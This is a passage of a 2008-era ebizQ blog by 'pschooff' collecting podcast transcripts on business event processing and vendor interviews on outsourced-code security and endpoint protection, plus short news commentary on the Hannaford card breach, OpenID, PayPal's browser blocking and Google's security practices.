***Editor's Note: If you are interested in the fast developing world of Event Processing, then do not miss the first ever virtual conference on Event Processing taking place at ebizQ right here!

Listen to or download the 3:01 minute podcast below:

Download file

What follows is a transcript of my podcast with Paul MacKay, worldwide sales leader of IBM’s WebSphere, where we discuss event processing: what it is, how it can benefit your business, and finally, the role event processing plays in SOA.

First of all, why don’t you give me a quick overview of what Business Event Processing is.

Well, Peter, Business Event Processing is really a software technology that provides the ability to sense when electronic signals indicating an actionable business situations have occurred and to coordinate the right response at the right time.

Now, exactly what is the benefit of Business Event Processing?

Well, Business Event Processing provides tremendous benefit in that it enables real-time patterns of events coming from disparate sources throughout a corporate infrastructure to be detected and to be evaluated and acted upon. But in addition to that, what Business Event Processing does is it abstracts the level at which the specification of these patterns are formed making it possible for business personnel themselves to take responsibility for designing, deploying and maintaining their own Business Event Processing patterns, that’s the real benefit.

The real benefit results in the much more rapid time to market, and much more rapid response to change, and empowering the business user to be able to take responsibility for the implementation of its own Business Event Processing needs.

I can certainly see how companies would be interested in something like that. Now, what exact role does Business Event Processing play in SOA?

Well, SOA focuses on the user’s view of a system at a conceptual level. SOA is really an extension of Object-Oriented Programming ideas, the principle of modularity, the design of an organization of the related services into a single service server module. So it relates services into groups of server modules. And event processing is a completely different ability.

Event processing is at the level of business events now entering the picture with a conceptual paradigm for remote access. A user no longer needs to access a service. Instead, a user can access services by sending and receiving events asynchronously. So they’re really complimentary, completely complementary paradigms doing completely different things. And together event processing and Service Oriented Architecture cover the entire waterfront of businesses needs.

Posted by pschooff in Podcast | Permalink | Comments (0) | TrackBacks (0)

***Editor's Note: If you are interested in the fast developing world of Event Processing, then do not miss the first ever virtual conference on Event Processing taking place at ebizQ right here!

Listen to or download the 6:27 minute podcast below:

Download file

What follows is a transcript of my podcast with Ruma Sanyal, Director of Worldwide Product Marketing for BEA's WebLogic Time and Event Driven Products, where Ruma explains all the buzz about Event Processing, how Event Processing works with SOA, BPM, and other implementations, and finally, how someone can get started with Event Processing.

Can you give me a quick overview of what Complex Event Processing is?

Sure. The straightforward definition of Complex Event Processing is as follows: Complex Event Processing correlates events into patterns that may present a threat or opportunity. Typically, processing vast amounts of data in real time. So although this is a great starting definition, I do want to add some color to that.

We prefer using the term “Event Processing” at least at BEA and when we speak with customers to refer to this area. We have found that in our discussions with customers and prospects that the term “Complex Event Processing” often conjures up images that it is a complex technology or the events involved have to be complex, etc.

So event processing we have found, is the term that is becoming popular as the umbrella term to describe simple event processing, which is events at a time with or without mediation, event driven architecture, event processing in the context of SOA, Service Oriented Architecture, and Business Process Management, BPM. As well as high performance often mission critical event processing, which is called “Complex Event Processing”, which is also perhaps the most interesting type of event processing and almost always the ultimate goal of any type of event processing.

So let's focus on this type of event processing for a minute. Typically, this includes high volumes of continuously or 'burstilly' streaming events that are of consequential to business, emanating from within, and are outside the business. These events from various sources have to be filtered, aggregated, correlated in real-time into a pattern that may represent a threat or opportunity to the business.

After that, a business process management system, or a custom application, or a human being might take an action to respond appropriately. Complex Event Processing systems need very special capabilities, ability to handle an order of magnitude highest performance in throughput, processing, and an ability to respond in real-time.

So CEP, typically, is the upstream capability that is sensing events coming in. And once filtered and aggregated, these get funneled to other systems. So the performance has to be off the higher order.

And it seems like everywhere you look nowadays, you see something about Complex Event Processing. Why all this buzz?

Sure. The volume of data bombarding an enterprise is increasing exponentially. So Gartner estimates that today a large enterprise is being hit with 10,000 to ten million events per second. Network bandwidths are not constrained any more, transaction volumes have increased tremendously, new types of transactions and interactions are emerging so you need to be able to handle tremendous amount of data.

Now, if you look at it from a slightly different angle from a technology evolution perspective, about 50% of the enterprises are well underway in their SOA implementation, another 40% have specific plans. Once all these services get invoked at the various layers of the enterprise, there will be tremendous amounts of data flowing through the enterprise backplane and event processing is the only technology, reasonable technology and cost effective technology that can take advantage of that.

So that's sort of from the supply side of data. And then from the demand side, couple that with the fact that customers and markets are becoming increasingly impatient in terms of standard of service and how service needs to continuously improve. A very simple example of that is expectations around overnight delivery.

The SLA for that has increased tremendously. Also, the final kicker is cost containment. Feeling the heat of globalization, enterprises are increasingly focused on cost and CEP is the only technology that can address the data volume and the response time issues that I just referred to without putting in place really costly homegrown solutions.

Now, does this mean customers implementing SOA, or BPM, or BAM, or integration, do they have to start all over again?

Oh no, they don't, not at all. We have conducted a primary market research survey in fall of 2007 with, in fact, ebizQ, you guys, asking people about their event processing implementation goals. And of the 450 respondents, 70% said that they have implementation plans with their SOA, BPM, or BAM projects for event processing. This is absolutely the right approach.

Event processing is not a rip and replace technology but complementary to SOA and BPM. And as far as BAM is concerned, it is one of the first and foremost applications, you know, that uses applications as leveraging event processing. If you talk to Gartner's Roy Schulte, he will concur. Also, BAM is very complementary and almost required for a BPM implementation.

So you can see how these are all sort of tied together and they should all be thought of as complementary technologies coexisting with each other and interfacing with each other.

Excellent. So how does someone get started with event processing?

So I sort of have a three-pronged advice. Here's sort of my advice based on what I've seen that works well with customers. Number one, think about your business with an event limb, think about events, their sources, their consumers, and things of that nature. Then number two, if you are implementing a SOA or a BPM project, think about which part of it lends well to event processing.

Are parts of some of your business process going to benefit from real-time information and real-time action? I think absolutely. Your challenge is to identify those. Can your services be represented as events and do they need to be? The answer in certain cases is absolutely. And then number three, identify a small project.

Typically, I have seen what really works well is a BAM implementation. Say for a particular business function like your sales order, implement event processing for such a project and prove success to the rest of the organization; it's that easy.

Posted by pschooff in Podcast | Permalink | Comments (0) | TrackBacks (0)

Found some interesting data on this Quocirca White Paper that, while I'm quite awhile that few companies put out White Papers that find their product is wildly unneeded, does have some interesting findings.

For one, the companies that admitted to being frequently hacked outsource at least some of their software development. Germans were the least likely to outsource their code, while Americans were the most likely (40% outsourcing for Germans, 61% for the United States of Somewhere Else). Note: to listen to my podcast on the subject of outsourcing and application security, click here.

66% of respondents said they were either using or in the process of adopting SOA, (with the fewest in the UK, and the most in Germany), but admitted that they little understood the threats SOA would introduce.

Finally, data protection is the key motivating factor behind companies getting serious about application security.

Gotta say, it makes sense to me.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

An interesting post over at Security Fix goes into detail on the recent Hannaford breach, from which 4.2 million credit and debit cards were stolen from store networks.

And what makes this story interesting is that Hannaford was no TJX, as in they weren't just leaving their data tucked behind the store sock display and in open site. In fact, Hannaford had been compliance certified in both 2007 and again in early 2008, but what that proves is PCI simply isn't extensive enough.

Simply put, PCI compliance is mostly written for e-tailers, and not for bricks and mortar type of business with most of their assets existing offline (which is a little harder to pin down with a simple software fix). As the perps haven't been caught yet (if someone calls up and tries to charge a Yacht on their credit card without even looking at it, call the authorities), experts are currently speculating that it was likely an inside job.

So how'd they do it? Most security defenses can be compared to a candy bar, i.e. crunchy on the outside, creamy and data richy in the center, and once the intruders gained access, it's easy for them to get around and do their damage, which in Hannaford's case enabled the infiltrators to install malware on the point-of-sale systems of 294 stores and simply collect all the credit and debit card number as each transaction was authorized (to listen to my podcast on this very subject, click right here).

How do you stop it? Network segmentation. Said Avivah Litan of Gartner Inc., "The PCI standards don't recognize that there's no good reason for a company's stores to be able to talk to one another when it comes to [processing] card data. The fact that malware was spread across almost 300 stores shows there wasn't good network segmentation in place at Hannaford."

For Hannaford, it's back to the security drawing board. They're putting military strength security in place, so the next time you accidentally find a stun-grenade in that bushel of apples you brought home from the supermarket, you know who to blame.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

Listen to or download the 7:57 minute podcast below:

Download file

What follows is a transcript of my podcast with Jack Danahy, Founder and Chief Technology Officer of Ounce Labs and one the industry’s most prominent advocates for software security assurance. In this podcast we discuss the security perils of outsourcing application development, whose responsibility it is to assure that applications are secure, how to actually make sure they are secure, and what Jack thinks the future of application outsourcing is both in terms of risk and reward.

What are some of the main security problems that arise when a company outsources their application development?

I would probably characterize them in two buckets and the first is communication. And we learned this early on as outsourcing was taking off in terms of functionality that organizations had to be pretty specific about what they wanted, if they wanted to get the most value out of the outsourcing. So it’s sort of – say to the first one is communication and the second one is enforcement where functionality is something again, which can be designed for.

It can also be fairly easily tested for and people know how to do that well. In security, the combination of these two things takes a slightly different form. A lot of organization haven’t really stopped themselves internally to think about what security means for an application, or business purpose to which they’re going to an outsourcer, nor have they thought hard about how they’re going to check to make sure that those things have been done.

So sometimes, what we’re seeing most is a lack of communication of what exactly an application is going to do and what’s going to require in terms of security. And then on the back end, they’re often times is a lack of sufficient enforcement technique and technology to be certain that the application has delivered satisfies those security requirements.

Great. Isn’t it the responsibility of the company developing the application to make sure it is secure?

Yeah, I think that’s exactly the right point. And the problem is that security is not a word that means the same thing for every application or to every organization. So I’ll give you an example. If I’m simply hosting up a website, and all its going to be doing is soliciting market feedback for something, and is fairly straightforward, and is not taking in private information, or exposing private information, then its level of security is by its nature going to naturally be lower than will be an application which is being developed perhaps to do payment, or transaction processing, or point-of-sale.

So as a result, the outsourcing group that’s responsible for developing the application, may very well develop a perfectly secure application for some definition of security, but it may not fully understand the business purpose of the application is going to be put to. And as a result, it may not be secure enough for that purpose. So the answer is, yes, they should design a secure application, but back to my earlier point on communication, it’s the responsibility of the organization asking them to build it to define what that means.

How common is it to have security vulnerability in an outsourced application?

I think, first off, its very, very common to have security vulnerabilities in a lot of different kinds of applications. One of the reasons why Ounce Labs is having the success we are is because a lot of organizations recognize that great applications meant to do a certain job whether it was perhaps not intended to be networks automatically, or that was intended to take in less secure data, and either the landscape, or the information needed has changed, aren’t necessarily designed to be as secure as they should be.

So this is not simply within the purview of outsourced applications but it’s pretty general. Outsourced applications are even more problematic, mainly, because of the fact that the organization developing it sometimes misses on the requirements for security for the groups that are actually asking them to build it.

And a good example of this would be any number of the outsourced applications that have resulted in some of the private information leakage. And many even times, it’s a well-built application that simply didn’t understand that the information was going to be a private style information.

How can a company make sure their applications then are free of vulnerabilities when they’re outsourcing?

I think one of the things we want to talk about in terms of an outsourced application when we talk about vulnerabilities is the first version, or the first flavor of vulnerabilities we care about, are those which sort of omitted problems, right. So I forgot to tell the provider that this information is going to be private and they should make sure that they never store it, or they only store it encrypted, or something like that.

And so the great way to do that is just tell them up front. The information that’s coming in this particular part of the application is going to be private, its confidential for me, or its going to be private from the user, so please be sure when you build your application that only authorized people can touch it, and only the people who the people who are sending it in really know what it looks like, and if you have to store it, its stored in a safe manner. Right.

So that is one of the big places where adding this kind of value can help by giving them that information upfront. Once the software arrives, best efforts being what they are, it’s still the responsibility of the organization who’s going to be running the software to ensure that the software as delivered is going to meet those security requirements.

So we definitely recommend using software analysis technology such as Ounce Labs to go through that application and be able to very conclusively say every time this data comes in, its encrypted, or its always destroyed and never stored, or that the authorization model is sufficient to make sure that the wrong people don’t have access to it.

So it’s this combination of being upfront, and taking the time, and sort of having sort of the internal rigor to define clearly for the outsourcer what it should look like, and then having both within your contract language as you define those requirements, this capacity to do enforcement, and then actually doing the enforcement on the back end so when it lands you can check to make sure it’s what you thought it was.

What are some of the warning signs that you might not want a company to develop your applications?

Well, a lot of what we see is some really substantial, favorable traction among the outsourcing community for taking on this style of requirement gathering this additional rigor in the development process.

But if you run into a company that says that they do not want to be held to this, that they don’t want the contract language to say that you’re going to reserve the right to check the code to make sure that it’s secure, or that you’re going to be asking them to do a specific set of things that you will later enforce within the contract with languages and sometimes with cost recovery. If they’re unwilling to accept that, that should really raise a massive warning flag because either number one, their expectation is that they’re likely to make makes a mistake and not deliver it.

Or number two, that their existing processes are pretty rigidly defined and so it’s difficult for them to move off of those to support your needs from a security perspective. Or number three, that they have a lot turnover perhaps in terms of their personnel and so they don’t have a sense of confidence that the actual people who will be doing the development are capable of manufacturing an application to the standards that you’ve given them.

So the main warning sign we look for are organizations, which are reticent to support what, I think, are very, very straightforward security requirements, which look a lot like functional requirements that most organizations are happy to take on.

Now, what do you see as the future for both outsourcing in terms of both the risk and the rewards?

Well, I think that there continues to be a great deal of motion not just from the cost-saving perspective, which clearly is one of the early drivers of outsourcing but the capacity of outsourcing to allow organizations to focus more directly of their core businesses. So financial services institutions can focus on great financial attractions with their partners, or healthcare agencies can focus on healthcare and not on application development.

So I think that the ongoing rewards will remain largely the same as they have been with his capacity of folks in your core business and achieve these cost savings. And I think the risks as more organizations begin to treat security as a fundamental almost functional requirement, I think, what you’ll find a happening is that the risks will actually go down.

I don’t think the risk are going to increase because I think the biggest risks existed when organizations didn’t feel comfortable asking for more secure applications, didn’t feel comfortable in their definition. In order to feel comfortable, sort of demanding that they be allowed to reserve the right to audit these things after they get delivered.

So I think what you’re actually going to see is that the rewards will continue to maintain their value and that the risks will actually decline as organizations take advantage of the knowledge that they can as for specific security characteristics which will protect them from liability, and that they will actually be able to enforce those when they come over the wall so that they will be more with in keeping their own internal and external compliance guidelines.

Posted by pschooff in Podcast | Permalink | Comments (0) | TrackBacks (0)

According to a post over at the Digital Identity Forum, one of the things people most dislike about using the web is the plethora of passwords required to access all the highways and byways of the information superhighway (does anyone use that phrase anymore, or has it been upgraded to the information super-duber-highway?).

And if you look at all the password tollbooths needed to access all the various places on the info superhighway, it start to look more like driving the Garden State Parkway down to the Jersey Shore (which has something like a million tollbooths).

Enter OpenID, which, with a two-part authentication process, promises single-sign on across the web. The only problem is that at this point, across the web is not all that extensive at this point. But recently, both Yahoo and Blogger have joined the ranks of OpenID providers, which means you can use your Yahoo or Blogger passwords for those sites to log onto OpenID.

While it's still not complete, as neither site allows you to log on to their sites using OpenID, it's a start. Now if you could only remember your Yahoo password.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

One wonders, with all the criminal activity that's going on in the web, where oh where does all that electronic cash go?

According to an article at Security Focus, while the US Department of Justice has had some success going after online money laundering sites in countries that continue to be hacker havens, just as many spring up to meet demand.

"Our hopes are that, at some point, we can bring Russia on board with these cybercriminal investigations," Cox said. "In the past, we had written off Russia and Romania (thinking) we would never get cooperation from them."

The DOJ has also beefed up it's cybercriminal resources, growing from 10 attorneys in 2000 to 30 today (while you could figure the increase in cybercrime dwaf that growth). But you can also point to the recent arrest of 11 Romanians as some evidence that the US is having some success in getting the more cyberlawless countries to cooperate.

But still, it's a mighty big world wide web, and while you do need online law enforcement, trying to stop cybercrime by stopping the criminals is like trying to stop cancer by outlawing it.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

In what I find is a very interesting decision (leave it to the financial sites to lead the way for cutting edge security), Paypal has announced that it will start banning unsafe browsers, saying that allowing customers to continue making online transaction with unsafe browsers "is equal to a car manufacturer allowing drivers to buy one of their vehicles without seat belts."

According to eWeek, Paypal, which is one of most often imitated sites in phishing attacks, is in the process of blacking any transaction using a Web browser that doesn't have anti-phishing protection.

PayPal, one of the brands most spoofed in phishing attacks, is working on a plan to block its users from making transactions from Web browsers that don't provide anti-phishing protection. PayPal, which is eBay owned, said that they will no longer support browsers that do not have blocking for identity theft-related Web sites or use EV SSL (Extended Validation Secure Sockets Layer) certificates.

In a white paper that details the five-pronged plan, PayPal specifically mentioned a specific group of customers who continue to use old and 'unsafe' browsers. "At PayPal, we are in the process of reimplementing controls which will first warn our customers when logging in to PayPal of those browsers that we consider unsafe. Later, we plan on blocking customers from accessing the site from the most unsafe—usually the oldest—browsers," he declared.

Among the 'unsafe' browsers mentioned were old and no-longer-supported versions of Internet Explorers, as well as Apple's Safari browers, which has no anti-phishing protection, and does not support EV SSL certificates. And while EV SSL certificate is not completely fail safe, PayPal believes it does offer a fairly easy and quick safe and unsafe site visual when surfing sites on the Web (and would likely be improved upon). In a separate announcement, both Firefox and Opera browsers have announced their intention to start supporting EV SSL.

Now let's hope PayPal doesn't start banning people that continually make tacky purchases on eBay. Which reminds me, I wonder how much that purple Elvis Lava Lamp is selling for now?

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

Since my podcast a month ago with Bruce Schneier over the future of security (which you can listen for yourself right here), I've kept close watch on his prediction that security would keep getting more integrated and less obtrusive, until one day it was entirely encapsulated within the application or service you're using.

In another sign that this is in fact the direction the industry is going, last week Microsoft announced at RSA that they were looking to take a back-to-basics approach to security (is that sort of like saying 'Turn around and run from Vista as fast as possible!). According to Search Security, Microsoft is looking to prevent future infections and attacks by using features like whitelisting, futher integration of TPMs and more use of code signing.

While these approaches have already been put to use in Windows XP and Vista, Microsoft continues to search for ways to make the OS as well as core application smarter and more efficient in order to block the threats as early as possible, while making them more automated and less intrusive.

"The threats are more complex. It's a maze now. We're seeing on average about a thousand new threats every day," said Vinny Gullotto, head of Microsoft's Malware Protection Center. "I'd say back in the days of LoveLetter and Nimda, we would see about 500 a month. Signature-based technology should be a final backstop. Behavior monitoring should be the main defense."

Still, Microsoft acknowledged that targeted threats like rootkits and custom Trojans used in many spear-phishing attacks represent a unique problem that won't be solved by signature-based tools. And Gullotto predicted that we have not even seen the peak of the problem just yet.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

Found a link over on Mike Rothman's Security Incite referring to Intel's Matthew Rosenquist talk at last week's RSA on their process to justify security investments. And like those old EF Hutten ads from what must be about twenty years ago, When Intel talks about security, IT people listen.

According to Intel, their return on Security Investment (ROSI) has a much higher level of accuracy then any other method currently being used. And while they admit that it's not a one size fits all metric, and most companies only want value measured their way, they say it does offer an empowering view of security value, which is likely a much better approach in the boardroom then the typical security sales pitch of, "Do this or else."

Intel breaks it down into five different topics, which are:

1) Practical Aspects of Measuring Security

2) Getting a Return on IT Security Investment

3) Managing the Effort to Measure Security

4) The Problem of Measuring Information Security

5) The Four Dirty Questions of Measuring Information Security

Definitely a recommended read right here.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

***Editor's Note: If you're interested in the secure B2B identity architecture of tomorrow , make sure you sign up for the Federation and User Centric Identity webinar today!

According to Symantec's most recent Internet Security Threat Report, the security industry is very near the tipping point (and by that I don't mean the point where you start thinking of rewarding the wait-service for their exceptional service).

As spelled out by Symantec, the tipping point in security comes when the number of legitimate programs are outnumbered by malicious or illegitimate ones. And in Symantec's last security report, they identified 1,122,311 unique threats, of which 711,912 were known to be created in 2007, which represents a 468 percent increase from 2006.

Why this is significant is, in terms of proper white listing and black listing, with so many ill intentioned programs looking to do damage, it makes black listing all that badware virtually impossible, and leaves white listing as the only sane alternative. And from those numbers, it clearly looks like we've passed the security tipping point, and maybe not in the too distant future TIPS will mean too insure proper security.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

In a keynote speech that Art Coviello gave at the RSA this past week, the EMC Executive Vice President and RSA Security Division President said, "We need to turn a longstanding stereotype of information security on its head and show how information-centric security can be an accelerator—and not an inhibitor—of business innovation and growth."

Almost everywhere you look, data security needs to work in lockstep with information management. Said Coviello, "Just look at the continued pace of security acquisitions by infrastructure companies and the integration of acquired technologies across all parts of the infrastructure."

But on the flip side, it's clear that many companies still see security as a necessary evil, or even a dis-abler. And according to Coviello, More than 80 percent of IT, security and business executives surveyed admit that their organizations have shied away from business innovation opportunities because of information security concerns, he said.

"This is what they said: 'Typically in most global organizations security is viewed at best as a necessary evil and more commonly as a necessary friction. This derives from security's primary focus on attempting to constrain behavior to prevent negative events. Although well-intentioned, the inevitable result is that security practitioners are not viewed as enablers but people preventing the business from doing what it needs to do."

And to change security into an innovation stopper, instead of drilling into the security shortcomings of every new idea, you have to start looking at things in terms of risk. It's just a change of mind, really, and hey, we security folks change our mind all the time. I mean, no we don't.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

It's like watching a game of 3D chess as these big companies head out on their security shopping sprees almost as soon as they identify a security need in the marketplace or weakness in their portfolio. But the results remain on trend, as big companies keep picking specialty security companies so that they can continue to be the one-stop security shop, the one place to go for all your security needs.

In fact, I did a podcast with IBM late last year about their goal of an end-to-end security solution which you can listen to right here.

IBM announced an agreement to buy FilesX, a privately held storage software company based in Newton, Mass., and Haifa, Israel, that specializes in continuous data protection and nearly instant data and application recovery software for enterprises and remote/branch offices. The acquisition is expected to close soon, and the financial terms were not reported. And as if it's any surprise, FilesX will become part of Tivoli Storage Manager product line.

“The FilesX acquisition would complement IBM’s vision of enterprise data protection by adding critical capabilities for remote offices, delivering continuous data protection for applications and servers, and supporting business user needs with nearly instantaneous recovery of data,” said Al Zollar, general manager, Tivoli software, IBM. “It would also reinforce IBM’s mid-market strategy by adding a simple and easy to use full data protection solution – one that also is attractive to enterprise remote offices and departmental situations.”

So the data protection, compliance and governance market remains HOT HOT HOT!

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

With the biggest online presence of pretty much any company anywhere (I just read somewhere that Google's search percentage is at it's highest ever), and with a well honed sense of reputation management -- does anyone remember the day when you first started using Google, and thought, Damn, how did they find that Michael Bolton bio so fast -- Google clearly has the most to lose if word suddenly got out that all those emails in gmail and spreadsheets in Google docs weren't being properly secured.

So what's Google's security culture like? According to Search Security, if you can't code, you can't do security at Google (let's hope that if you're lousy at security you can't do security at Google as well).

"Google has a decidedly go-at-it-alone conventional approach to solving problems," security director Scott Petry said Tuesday during an interview at RSA Conference 2008. "This is most evident in the value of security inside engineering."

In essence, Google has integrated security throughout their development lifecycle. Nooglers (which are new developers at Google), have to attend multi-day security training seminars before they're even assigned to a team or project. At the seminars the Nooglers learn everything from policy to process development to code hacking.

And before a project goes live, the production code has to pass peer-review with Google security teams along with any member of the engineering community. "No one person is authorized to write code into production," Petry said. And that's just from the inside.

In terms of outside attacks, Google keeps a database of attacks against the company which is then tested against any future Google code. The idea at, instead of looking at an attack as something only criminals do, Google looks at attacks as a lesson to be learned.

This pretty much squares with what's becoming standard operating procedure when developing web applications (or at least should be): think about security early and think about it often. And if you do that, then maybe you too can be a Moogle (that's my term for an old person at Google, you know, someone about to be put out to pasture).

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

While this falls pretty much in line with Bruce Schneier's prediction in this podcast -- in which he predicted the security industry would continue to consolidate, but he meant more along the line of nonsecurity companies integrating security into their applications so that security would no longer be a stand-alone product -- you can still see Cisco and RSA partnering as part of the bigger consolidation trend.

In what Cisco says is an attempt to address a very fragmented data security market, RSA, the security unit of EMC, announced it will integrate its next-gen data loss prevention (DLP) with Cisco in order to provide customers with the ability to discover, secure, track and enforce the usage of sensitive data stored in the data center and at desktop and server endpoints, as well as while sensitive data is transmitted across enterprise networks.

This collaboration will continue to collaborate in data center security, data encryption and key management, but also expand on their PCI reference architecture which helps enable customers to audit and run reports on their systems to ensure compliance with PCI regulations.

"Data security is very challenging. Due to regulatory and non-regulatory drivers, customers need to secure sensitive data and gain stronger visibility into where that data resides. The answer lies in coordinated product innovation, strategic partnership and professional services,” said Dennis Hoffman, Vice President and General Manager for Data Security and Chief Strategy Officer at RSA, the Security Division of EMC. “By working with industry leaders, like Cisco, we are helping our customers solve these challenges. By developing solutions with Cisco, customers can discover, monitor, and enforce the use of sensitive data directly into the infrastructure – no matter where it moves, how it moves or where it is stored."

Since security complexity is such a big issue, when it comes something as important as data security, it makes sense for two companies as big as Cisco and RSA to join forces to offer a comprehensive data protection solution.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

Some interesting news came over the wire today, the first being Finjan's finding on the rise of crimeware-as-a-service. I guess it's not too surprising, really, seeing that we have security-as-a-service, and I guess with any technology advancement for good, there will also be a technological advancement for bad. Check out the press release yourself right here.

That's really just more confirmation that the cybercriminals are getting more and more organized. And as I live in NYC, I'm glad that's not necessary true of crime on the street (although NYC is pretty darn safe nowadays), I'm real glad I don't have to worry about being stuck-up by remote controlled robots or anything.

The other bit of news I found quite interesting is the report from Quocrica, the European information technology analysis group (which you can read right here), which found that outsourced code is more likely to be hacked (and with 90 percent of companies outsourcing code, that could be a real problem).

And as outsourcing isn't going to go away anytime soon, the one thing companies should be doing but aren't is insisting that security be built right into the product.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

According to Brian Krebs Security Fix, the number of personal and financial records already leaked, spilled, or stolen already this year totals...8.3 million records.

This number comes from San Diego based Identity Theft Resource Center, the 8.3 million coming from a total of 167 breaches, which compares with 448 total breaches in all of 2007.

Some somewhat good news out of this is more than half of the total came from the Hannaford Bros. intrusion, which totaled a loss of 4.2 million records. Businesses were responsible for 36% of the data leakage, while schools made up 25%, government and military 18%, medical/healthcare 14%, banking and financial 7%, and your parents make up the rest (just kidding about your parents).

Most telling, though, is that only 13% of the breaches were the result of hackers gaining access, while the great majority came from lost or stolen laptops, memory sticks, or hard drives, with insider abuse along with human error cited as the next most common reasons.

Said Linda Foley, founder of the ID Theft Resource Center, "The question of why we are hearing more about data breaches is going to take us a couple of more years to sort out," Foley said. "I think, perhaps in addition to the state [disclosure laws], companies are urged on a bit by the fear of the media taking the story and releasing it rather than the companies themselves getting a chance to the spin the news."

Let's just hope it's one or two people's records that just keep getting stolen over and over again. Wonder what the max limit on that credit card is?

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

***Editor's Note: Get up-to-speed on the strengths and weaknesses of today's identity architecture and the tools you'll need to secure identity and access for tomorrow by signing up for this webinar.

Listen to or download the 11:06 minute podcast below:

Download file

What follows is a transcript of my discussion with John Shaw, the Director of Endpoint Security and Control and Sophos. John drives the inception, development, and launch of new products at Sophos, and together we discuss the current vulnerabilities, what's wrong with most security products today, what John thinks about Microsoft Vista, along with his take on Bruce Schneier's comment that standalone security will one day cease to exist, and much, much more.

What security threats do companies need to be most concerned with today?

So there's obviously a whole range of threats out there. I think that whenever we talk to businesses and hear what they're most concerned about, the traditional issues of viruses, and worms, and so on are still very much front of mind. Increasingly, of course, there are issues such as data leakage, and more generally, just control over the kind of use that's being made of corporate assets and where data is going are clearly very hot topics as well.

When it comes to the kind of the nature of the threat, we're seeing sort of a couple of key changes going on. One, is that the Web has a big part to play in a huge proportion of the threats we're seeing these days in terms of spyware, in particular, both the way that people get infected, also the way that information gets stolen back out of an organization.

And the other factor that we're really seeing is that because threats are being very commercially driven these days that they're much harder to detect, they're much more under the radar, they're much more targeted. And what this means is that the kind of traditional methods of using signature-based antivirus are no longer enough to protect against those kind of threats. It's no longer enough to wait until one company has been infected and produce a signature to protect everyone else.

What is Sophos doing exactly to address these threats?

So something we've been doing for the last couple of years now around the nature of this sort of targeted, rapidly changing threats is to do much more in terms of proactive protection. So we've moved beyond signature-based protection. Signature-based is still very much at the heart of what we do, but we've doing much more in terms of behavioral-based detection so you're able to detect and stop new threats before they've been seen by anyone, before signature is being produced and we're stopping around 80% of the new pieces of adware, spyware, virus and so on that we see coming out. Around 80% are beings stopped by our proactive technology, if you like, today.

And then the recent announcement is really around us going even further than that. Where we see the biggest hole now in people's defenses is actually around being confident that that kind of proactive software, antivirus software is actually running on each of your computers and that the computers are properly patched and so on. So these days what were offering customers -- what we've just announced is the ability to do what we're calling "preventive protection".

So this is about, rather like preventive health, this is about making sure that computers on a company's network are properly protected, are running up-to-date software, are running the right patches, are running the right service packs and so on, so that when a threat targets them, a business can be confident that the computer's actually going to be protected.

Gotcha. Now, what you think is wrong with most companies security solutions today?

Well, I think that -- really, that last issue I was talking is probably the biggest concern, you know. When we look at why it is that businesses continue to have an issue with being infected with malware, with having data stolen from their networks, it's often because it's very hard for an IT manager these days to be confident that the computers on the network or running the right software and are up-to-date; so that's about two things.

One, it's about that pesky problem of the end-user and the end-user changing stuff. So, you know, it's hard for an IT admin to keep control of the way that their computer's are setup and configured so end-user inevitably want to fiddle things and change things. And the other challenge that's there is really around the management solution for security solutions and the visibility they provide. It's very hard actually to have a tool that is simple to use and simple to show you the state of protection on your computers; how compliant your computers are. So those are probably the big challenges that we see businesses facing today in terms of their current security solutions.

Now, I saw with your announcement -- tell me what exactly is the advantage of integrating NAC with Endpoint Security Protection?

So, yeah, as you say, what we've done is integrated NAC or network access control type technologies. And the advantage of doing that as well as now doing the job of protecting each computer, we're looking at the kind of network as a whole and ensuring that every computer on the network is healthy and protected.

Now, why does it need to be done, you know, by the same solution? It really comes to a couple of things. One is the issue of agent pollution. What we find is that IT managers really don't want to keep on putting yet more and more bits of software onto their computers; it creates a headache in terms of management, and it slows computers down, and it can be very invasive. So agent pollution is one issue so they really don't want to go to yet another vendor and put yet another agent on every computer in order to ensure that computers are healthy.

And the other piece is around management. Again, as you know, particularly in the current and economic climate, IT teams budgets are not getting any bigger, they're probably being asked to do more stuff but with a budget that isn't rising. And there's such demand on IT managers time that they really don't want to be learning new complex management tools. So the approach we've taken is to say it's a single deployment.

We don't ask you to do any sort of separate agent deployment onto the computer, it's part of the job of doing antivirus we're already doing, and we're letting you manage this stuff through the same management toolset that our customers are already using to manage antivirus and endpoint security.

Awhile ago, there was some disagreement between security companies over Microsoft Vista. What's your opinion on Vista today?

Well, you know, I view Vista as definitely an advance from Microsoft in terms of the security of the operating system, so it is a more secure operating system than Windows XP and that is absolutely a positive development. I think there have been some debate around some of our competitors around Microsoft shutting security vendors out of Vista in some way. Because they -- part of the locking down that Microsoft has done had made it hard for some security software to run.

We actually felt even at the time that actually Microsoft had done the right thing, that was, you know, better net benefit to the customer that operating system is more secure and that it really it was up to security vendors to make their software work in the right way. We've also seen from with Microsoft with Vista Service Pack 1, some good developments in terms of opening up in a properly secure way more interfaces for third-party security vendors. So, basically, what we think is that Vista is going from a security perspective at least much [0:06:51] the right things with Vista.

Gotcha. Now, security guru Bruce Schneier believes that at some point security will no longer be a separate solution but will be coupled with whatever application or service you're using. What's your take on that?

Well, again, I think, as always, the truth is always somewhere in between. It's certainly the case that there is a trend towards, for example, vendors such as Microsoft putting more emphasis on security and putting more security features into their products and that can only be a good thing. So, you know, taking Vista as an example, yes, Vista is more secure but is it the case that you no longer need to run security software on it? Of course not.

